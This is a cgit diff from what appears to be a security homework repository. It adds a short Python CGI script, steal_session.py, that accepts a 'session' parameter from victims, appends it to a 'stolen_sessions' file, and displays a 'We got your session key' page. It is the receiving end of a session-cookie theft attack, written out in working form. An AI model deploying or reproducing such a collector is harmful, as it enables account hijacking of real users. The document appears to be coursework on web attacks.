summaryrefslogtreecommitdiff
path: root/hw4/cgi-bin/steal_session.py
diff options
context:
space:
mode:
Diffstat (limited to 'hw4/cgi-bin/steal_session.py')
-rwxr-xr-xhw4/cgi-bin/steal_session.py24
1 files changed, 24 insertions, 0 deletions
diff --git a/hw4/cgi-bin/steal_session.py b/hw4/cgi-bin/steal_session.py
new file mode 100755
index 0000000..df84de6
--- /dev/null
+++ b/hw4/cgi-bin/steal_session.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python2.7
+import Cookie, os, time
+import re
+import uuid
+import cgi
+import cgitb
+
+from output import *
+
+cgitb.enable() ## allows for debugging errors from the cgi scripts in the browser
+
+cookie = Cookie.SimpleCookie() # for writing cookies
+form = cgi.FieldStorage() # for reading GET data
+
+session = form.getvalue('session')
+
+if session:
+ with open('stolen_sessions','a') as m:
+ m.write(session + '\n')
+
+#Send victim to homepage so they don't notice anything!
+print 'Content-Type: text/html\n'
+print '<html><body><p style="font-size:25px"><img src="http://icons.iconarchive.com/icons/iconsmind/outline/512/Evil-icon.png" height=50 width=50 align="middle"></img> &nbsp; We got your session key &nbsp; <img src="http://icons.iconarchive.com/icons/iconsmind/outline/512/Evil-icon.png" height=50 width=50 align="middle"></img></p></body></html>'
+exit(0)
generated by cgit v1.2.3 (git 2.25.1) at 2024-05-03 13:58:14 +0000